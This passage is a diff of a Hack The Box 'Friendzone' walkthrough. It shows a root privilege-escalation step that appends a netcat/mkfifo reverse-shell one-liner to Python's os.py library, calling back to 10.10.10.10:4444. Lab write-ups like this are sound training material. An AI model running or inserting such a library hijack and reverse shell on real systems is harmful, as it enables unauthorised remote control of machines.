Har1743/Har1743.github.io/Walkthroughs/Friendzone-HTB.md

 * os.py
 * os.pyc

-Now let's append our reverse shell in python2.7 folder where os.py located</br>
+Now let's append our reverse shell in python2.7 folder where os.py located
 Basically we will append our reverse shell in os.py so that when the process run we got a shell.

 `echo 'import os; os.system(" rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4444 >/tmp/f ");' >> os.py`

-before executing this start the listener </br>
+before executing this start the listener
 we will got our shell in few seconds or minutes later

 ![](https://github.com/Har1743/Hardik-writeups/blob/master/Walkthroughs/photos/Friendzone-photos/root.png)